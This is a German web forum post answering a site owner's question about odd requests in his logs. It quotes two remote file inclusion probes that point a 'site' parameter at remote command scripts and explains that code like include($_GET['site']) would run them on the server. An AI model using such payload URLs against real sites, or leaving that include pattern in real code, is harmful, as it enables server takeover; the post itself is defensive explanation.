Jonathan: Captchas

Beitrag lesen

SELF-Forum

Captchas

Jonathan
Informationen zu den Bewertungsregeln

Hallo Kodi,

meineseite.php?site=http://www.cmdlist.xpg.com.br/cmd.txt
oder z.b.
meineseite.php?site=http://www.vuls2008.kit.net/rev.txt

in der Zweiten txt steht irgendwie auch was von wegen smtp.

Ist es das? Und jemand ne Idee wie ich mich davor schützen kann.
Ich glaub das ist es.

Naja, der angreifer schickt dir hier einfach irgendwelche GET-Parameter. Das ist prinzipiell unproblematisch. Allerdings nur sofern dein Script nicht darauf reagiert.

Wenn du in deinem PHP-Dateien sowas hast wie include($_GET["site"]); dann includest du u.U. die angebene Datei, die dann allen möglichen Schadcode auf deinem Server ausführen kann, z.B. Mails versenden, Dateien löschen/verändern/auslesen usw.

Jonathan

--
Selfcode: ie:( fl:{ br:> va:) ls:& fo:) rl:? ss:} de:> js:| ch:? mo:} zu:)
Beitrag melden
Informationen zu den Bewertungsregeln
0 37

True Type Fonts Schriftart in Kommerzielles Skript verwenden??

Kodi
  • recht
  1. 0
    Gonzo
    1. 1

      Captchas

      Gonzo
      • software
      1. 0
        suit
        1. 0
          Kodi
          1. 0
            suit
            1. 0
              Jonathan
              1. 0
                suit
                1. 0
                  ritschmanhard
                  1. 0
                    Gunnar Bittersmann
                    1. 0
                      Kodi
                      1. 0
                        Jonathan
                        1. 0
                          Kodi
                          1. 0
                            Kodi
                            1. 0
                              Jonathan
                              1. 0
                                Kodi
                                1. 0
                                  Jonathan
                                  1. 0
                                    Kodi
                  2. 0
                    MudGuard
                2. 0
                  Jonathan
                  1. 0
                    suit
                  2. 0
                    ritschmanhard
                    1. 0
                      suit
                    2. 0
                      Jonathan
                      1. 0
                        ritschmanhard
                        1. 0
                          Jonathan
                        2. 0
                          MudGuard
                    3. 0
                      MudGuard
                      1. 0
                        Gunnar Bittersmann
                        1. 0
                          Gunnar Bittersmann
                        2. 0
                          MudGuard
          2. 0
            Gunnar Bittersmann
            1. 0
              Kai345
              1. 0
                Engin
          3. 0
            Gonzo
    2. 0
      kodi
  2. 0
    Jonathan